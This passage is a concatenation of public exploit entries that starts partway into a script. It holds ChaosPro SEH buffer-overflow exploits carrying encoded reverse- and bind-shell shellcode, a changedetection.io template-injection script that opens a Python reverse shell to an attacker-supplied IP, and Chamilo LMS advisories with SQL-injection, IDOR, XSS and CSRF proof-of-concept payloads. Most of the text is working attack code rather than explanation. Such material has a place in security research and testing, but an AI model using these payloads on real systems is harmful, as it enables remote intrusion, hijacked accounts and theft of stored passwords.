junk += "A" * (118 - len(egghunter))
# open calc
junk += egghunter
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpbackD0
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\xab\x11\x40"
# write the evil file
with open('C:\\Program Files\\ChaosPro2.1\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)
#!C:\Python27\python.exe
# Title : ChaosPro 2.0
# Twitter : @securitychops
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
#this needs to be a backwards jump to give us room to call stack jump code
jmpback80 = "\x40\x75\x80\x75"
jmpforward06 = "\x40\x75\x06\x75"
# our egghunter shellcode
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
"\xaf\x75\xe4\xff\xe7"
)
# our egg!
payload = "T00WT00W"
#the payload
payload += (
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
"\x4b\x4f\x39\x45\x4d\x47\x42\x4a\x35\x55\x52\x48\x45\x5a\x53"
"\x30\x33\x37\x34\x51\x52\x48\x45\x52\x53\x30\x54\x51\x31\x4c"
"\x4d\x59\x5a\x46\x32\x4a\x52\x30\x50\x56\x46\x37\x32\x48\x5a"
"\x39\x59\x35\x54\x34\x43\x51\x4b\x4f\x39\x45\x4d\x55\x49\x50"
"\x33\x44\x44\x4c\x4b\x4f\x30\x4e\x44\x48\x43\x45\x5a\x4c\x35"
"\x38\x4c\x30\x48\x35\x4f\x52\x36\x36\x4b\x4f\x49\x45\x55\x38"
"\x52\x43\x52\x4d\x52\x44\x43\x30\x4b\x39\x4b\x53\x56\x37\x46"
"\x37\x31\x47\x50\x31\x4a\x56\x33\x5a\x42\x32\x51\x49\x46\x36"
"\x4b\x52\x4b\x4d\x53\x56\x4f\x37\x51\x54\x57\x54\x37\x4c\x53"
"\x31\x43\x31\x4c\x4d\x50\x44\x31\x34\x34\x50\x58\x46\x55\x50"
"\x30\x44\x31\x44\x30\x50\x30\x56\x50\x56\x50\x56\x30\x46\x36"
"\x36\x50\x4e\x31\x46\x50\x56\x50\x53\x31\x46\x43\x58\x52\x59"
"\x58\x4c\x47\x4f\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50"
"\x4e\x30\x56\x57\x36\x4b\x4f\x36\x50\x45\x38\x44\x48\x4c\x47"
"\x35\x4d\x45\x30\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x48\x35\x59"
"\x32\x30\x56\x42\x48\x4e\x46\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f"
"\x4e\x35\x37\x4c\x54\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4b"
"\x50\x52\x55\x33\x35\x4f\x4b\x31\x57\x54\x53\x54\x32\x32\x4f"
"\x43\x5a\x33\x30\x31\x43\x4b\x4f\x4e\x35\x41\x41"
)
#line containing our payload
line_start = "Username "
line_start += payload + "\n"
#line with our overflow
line_start += "ProjectPath "
junk = line_start
junk += "A" * (2705 - len(jmpforward06) - len(jmpback80) - len(egghunter))
# our egghunter ...
junk += egghunter
# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)
junk += jmpforward06
junk += jmpback80
#seh address for pop, pop and ret with a 0x00 at the end ...
junk += "\x50\x49\x40"
# write the evil file
with open('C:\\Documents and Settings\\Administrator\\My Documents\\Downloads\\cpro20\\ChaosPro.cfg', 'w') as the_file:
the_file.write(junk)
# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM
#!/usr/bin/env python2
import os, sys
# sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000 # 326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705
# sploit = "A" * (2705 - 4 - 126) # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16
################ Second stage ####################
sploit = "A"*16
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
sploit += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
"\x6f\x39\x45\x41\x41"
) # 710 bytes
sploit += "A" * (2575 - 16 - 710)
################ First stage ####################
# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32 54 PUSH ESP
# 0012FF33 58 POP EAX
# 0012FF34 66:05 3C18 ADD AX,183C
# 0012FF38 50 PUSH EAX
# 0012FF39 5C POP ESP
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8
# target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
# 0: 25 28 28 28 28 and eax,0x28282828
# 5: 25 47 47 47 47 and eax,0x47474747
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 7f 01 01 01 sub eax,0x101017f
# 14: 2d 03 18 3e 3e sub eax,0x3e3e1803
# 19: 50 push eax
sploit += (
"\x25\x28\x28\x28\x28"
"\x25\x47\x47\x47\x47"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x7f\x01\x01\x01"
"\x2d\x03\x18\x3e\x3e"
"\x50"
) # 26 bytes
## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54 44 INC ESP
# 0012FF55 44 INC ESP
# 0012FF56 44 INC ESP
# 0012FF57 44 INC ESP
# 0012FF58 44 INC ESP
# 0012FF59 44 INC ESP
# 0012FF5A 44 INC ESP
# 0012FF5B 44 INC ESP
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8
## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
# 0: 25 02 02 02 02 and eax,0x2020202
# 5: 25 51 51 51 51 and eax,0x51515151
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 01 01 01 61 sub eax,0x61010101
# 14: 2d 64 08 6d 1f sub eax,0x1f6d0864
# 19: 50 push eax
sploit +=(
"\x25\x02\x02\x02\x02"
"\x25\x51\x51\x51\x51"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x01\x01\x01\x61"
"\x2d\x64\x08\x6d\x1f"
"\x50"
) # 26 bytes
## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C POP ESP
sploit += "\x5c" # 1
sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)
################ RET from SEH: JMP SHORT - 126 ####################
sploit += "\xeb\x80" + "\x41\x41" # 4
# 00401B44 |. 5F POP EDI
# 00401B45 |> 5E POP ESI
# 00401B46 \. C3 RETN
sploit += "\x44\x1b\x40\x00"
################ build the config ####################
## Running from just outside base directory of ChaosPro:
def ret_cfg(inp):
# do it live in PicturePath
cfg = """PicturePath %s""" % inp
with open("chaospro\\ChaosPro.cfg",'w') as F:
F.write(cfg)
F.close()
ret_cfg(sploit)
# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)
# Date: 5-26-2024
# Exploit Author: Zach Crosman (zcrosman)
# Vendor Homepage: changedetection.io
# Software Link: https://github.com/dgtlmoon/changedetection.io
# Version: <= 0.45.20
# Tested on: Linux
# CVE : CVE-2024-32651
from pwn import *
import requests
from bs4 import BeautifulSoup
import argparse
def start_listener(port):
listener = listen(port)
print(f"Listening on port {port}...")
conn = listener.wait_for_connection()
print("Connection received!")
context.newline = b'\r\n'
# Switch to interactive mode
conn.interactive()
def add_detection(url, listen_ip, listen_port, notification_url=''):
session = requests.Session()
# First request to get CSRF token
request1_headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = session.get(url, headers=request1_headers)
soup = BeautifulSoup(response.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrf_token'})['value']
print(f'Obtained CSRF token: {csrf_token}')
# Second request to submit the form and get the redirect URL
add_url = f"{url}/form/add/quickwatch"
add_url_headers = { # Define add_url_headers here
"Origin": url,
"Content-Type": "application/x-www-form-urlencoded"
}
add_url_data = {
"csrf_token": csrf_token,
"url": "https://reddit.com/r/baseball",
"tags": '',
"edit_and_watch_submit_button": "Edit > Watch",
"processor": "text_json_diff"
}
post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)
# Extract the URL from the Location header
if 'Location' in post_response.headers:
redirect_url = post_response.headers['Location']
print(f'Redirect URL: {redirect_url}')
else:
print('No redirect URL found')
return
# Third request to add the changedetection url with ssti in notification config
save_detection_url = f"{url}{redirect_url}"
save_detection_headers = { # Define save_detection_headers here
"Referer": redirect_url,
"Cookie": f"session={session.cookies.get('session')}"
}
save_detection_data = {
"csrf_token": csrf_token,
"url": "https://reddit.com/r/all",
"title": '',
"tags": '',
"time_between_check-weeks": '',
"time_between_check-days": '',
"time_between_check-hours": '',
"time_between_check-minutes": '',
"time_between_check-seconds": '30',
"filter_failure_notification_send": 'y',
"fetch_backend": 'system',
"webdriver_delay": '',
"webdriver_js_execute_code": '',
"method": 'GET',
"headers": '',
"body": '',
"notification_urls": notification_url,
"notification_title": '',
"notification_body": f"""
{{% for x in ().__class__.__base__.__subclasses__() %}}
{{% if "warning" in x.__name__ %}}
{{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
{{% endif %}}
{{% endfor %}}
""",
"notification_format": 'System default',
"include_filters": '',
"subtractive_selectors": '',
"filter_text_added": 'y',
"filter_text_replaced": 'y',
"filter_text_removed": 'y',
"trigger_text": '',
"ignore_text": '',
"text_should_not_be_present": '',
"extract_text": '',
"save_button": 'Save'
}
final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)
print('Final request made.')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Add detection and start listener')
parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')
parser.add_argument('--port', type=int, help='Port for the listener', default=4444)
parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')
parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')
args = parser.parse_args()
add_detection(args.url, args.ip, args.port, args.notification)
start_listener(args.port)
Document Title:
===============
Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1720
Video: https://www.youtube.com/watch?v=3ApPhUIk12Y
Release Date:
=============
2016-02-15
Vulnerability Laboratory ID (VL-ID):
====================================
1720
Common Vulnerability Scoring System:
====================================
6.1
Product & Service Introduction:
===============================
Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally.
It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and
the building of a network of services providers and software contributors.
The Chamilo project aims at ensuring the availability and quality of education at a reduced cost, through the distribution of its software free of charge,
the improvement of its interface for 3rd world countries devices portability and the provision of a free access public e-learning campus.
(Copy of the Homepage: https://chamilo.org/chamilo-lms/ )
Abstract Advisory Information:
==============================
An Insecure Direct Object Reference vulnerability has been discoverd in the official web-application Product Chamilo LMS.
Vulnerability Disclosure Timeline:
==================================
2016-02-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An insecure direct object references occurd when an application provides direct access to objects based on user-supplied input.
As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for deleting
another users social wall posts Insecure Direct Object References allow attackers to bypass authorization and access resources
directly by modifying the value of a parameter[Message id] used to directly point to an Message id of social wall post id.
Vulnerability Method(s):
[+] GET
Vulnerable File(s):
[+] social/profile.php
Vulnerable Parameter(s):
[+] messageId
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
1. User A goes to User B or Admin soical wall in platform : /profile.php?u=[USER ID]
2. choose any Posts related to USER B or ADMIN . and figure out the messageId of Post by replaying to it and
intercept the data to show the messageId parameter.
3. User A as Remote attacker will use this link filled with messageId in last to delete others posts
http://SOMESITE/CHAMILOSCRIPTPATH/main/social/profile.php?messageId=28
Security Risk:
==============
The security risk of the object reference web validation vulnerability in the web-application is estimated as high. (CVSS 6.1)
Credits & Authors:
==================
Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
# Exploit Title: Chamilo LMS 1.9.8 Blind SQL Injection
# Date: 06-12-2014
# Software Link: http://www.chamilo.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Database::escape_string() function is used to sanitize data but it will work only in two situations: "function_output" or 'function_output'.
There is few places where this function is used without quotation marks.
http://security.szurek.pl/chamilo-lms-198-blind-sql-injection.html
2. Proof of Concept
For this exploit you need teacher privilege (api_is_allowed_to_edit(false, true)) and at least one forum category must exist (get_forum_categories()).
<form method="post" action="http://chamilo-url/main/forum/?action=move&content=forum&SubmitForumCategory=1&direction=1&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)">
<input type="hidden" name="SubmitForumCategory" value="1">
<input type="submit" value="Hack!">
</form>
For second exploit you need administrator privilege (there is no CSRF protection):
http://chamilo-url/main/reservation/m_category.php?action=delete&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)
Those SQL will check if first password character user ID=1 is "d".
3. Solution:
Update to version 1.9.10
https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues
I. Overview
========================================================
Chamilo LMS 1.9.10 or prior versions are prone to a multiple Cross-Site Scripting (Stored + Reflected) & CSRF vulnerabilities. These vulnerabilities allows an attacker to gain control over valid user accounts in LMS, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more.
II. Severity
========================================================
Rating: High
Remote: Yes
Authentication Require: Yes
CVE-ID:
III. Vendor's Description of Application
========================================================
Chamilo LMS, or Chamilo Learning Management System is a piece of software that allows you to create a virtual campus for the provision of online or semi-online training. It is distributed under the GNU/GPLv3+ license and its development process is public. All the Chamilo software products are entirely free (as in freedom), free (as in beer) and complete, and are production-ready without requiring any type of payment.
https://chamilo.org/chamilo-lms/
IV. Vulnerability Details & Exploit
========================================================
1) Multiple Reflected XSS Request
Request Method = GET
XSS PoC's:-
/main/calendar/agenda_list.php?type=personal%27%20onmouseover=%27confirm%280%29%27/%3E%3C!--
/main/messages/outbox.php?f=social"+onmouseover="confirm(0)
/main/mySpace/student.php?keyword=31337"+onmouseover=confirm(0)//&active=0&_qf__search_user=&submit=Search
/main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax_get_file_listing.php?editor=stand_alone&view=thumbnail&search=1&search_name=admin&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=;</script><script>confirm(0)</script>
/main/admin/configure_extensions.php?display=</script><script>confirm(0)</script>
/main/admin/course_category.php?action=add&category="/><script>confirm(0)</script>
/main/admin/session_edit.php?page=resume_session.php%22%20onmouseover=confirm%280%29//&id=1
b) User Agent Header XSS (Reflected)
GET /main/admin/system_status.php?section=webserver
User-Agent: <script>confirm(0)</script>
__________________________________________________________
2) Stored XSS
File Attachment Description parameter (legend[]) is vulnerable to Stored XSS By utilizing "social network" an attacker may send a crafted message to anybody with XSS payload in the file attachment description field (i.e legend[])
Request Method : POST
Location = /main/messages/new_message.php?f=social
Parameter = legend[]
Stored XSS PoC :-
POST /main/messages/new_message.php?f=social HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/main/messages/new_message.php?f=social
Cookie: XXXXXXXXXXXXXXXXXXXXXX
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------8461144986726
Content-Length: 1023
-----------------------------8461144986726
Content-Disposition: form-data; name="users[]"
3
-----------------------------8461144986726
Content-Disposition: form-data; name="title"
Stored XSS Test Via Social network
-----------------------------8461144986726
Content-Disposition: form-data; name="content"
This is test message<BR>
-----------------------------8461144986726
Content-Disposition: form-data; name="attach_1"; filename="test.txt"
Content-Type: text/plain
I owned you !!!!
-----------------------------8461144986726
Content-Disposition: form-data; name="legend[]"
Cool File <script>confirm(0)</script>
-----------------------------8461144986726
Content-Disposition: form-data; name="compose"
-----------------------------8461144986726
Content-Disposition: form-data; name="_qf__compose_message"
-----------------------------8461144986726
Content-Disposition: form-data; name="sec_token"
42917ca29da38f60d49bbaf2ba89b1b9
-----------------------------8461144986726--
________________________________________________________________________
3) CSRF & Stored XSS Request
Method = POST
Location = /main/admin/session_add.php
Parameter = name
POST /main/admin/session_add.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1//main/admin/session_add.php
Cookie:XXXXXXXXXXXXXXXXXXXXXX
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
formSent=1&name=<script>confirm(0)</script>&coach_username=rehan&session_category=0&nb_days_acess_before=0&nb_days_acess_after=0&start_limit=on&day_start=2&month_start=3&year_start=2015&end_limit=on&day_end=2&month_end=3&year_end=2016&session_visibility=2
CSRF PoC:-
<html>
<!-- CSRF Request With Stored XSS Payload -->
<body>
<form action="http://127.0.0.1/main/admin/session_add.php"
method="POST">
<input type="hidden" name="formSent" value="1" />
<input type="hidden" name="name"
value="Test<script>confirm(0)</script>" />
<input type="hidden" name="coach_username" value="admin" />
<input type="hidden" name="session_category" value="0" />
<input type="hidden" name="nb_days_acess_before"
value="0" />
<input type="hidden" name="nb_days_acess_after"
value="0" />
<input type="hidden" name="start_limit" value="on" />
<input type="hidden" name="day_start" value="2" />
<input type="hidden" name="month_start" value="3" />
<input type="hidden" name="year_start" value="2015" />
<input type="hidden" name="end_limit" value="on" />
<input type="hidden" name="day_end" value="2" />
<input type="hidden" name="month_end" value="3" />
<input type="hidden" name="year_end" value="2016" />
<input type="hidden" name="session_visibility" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
VI. Affected Systems
========================================================
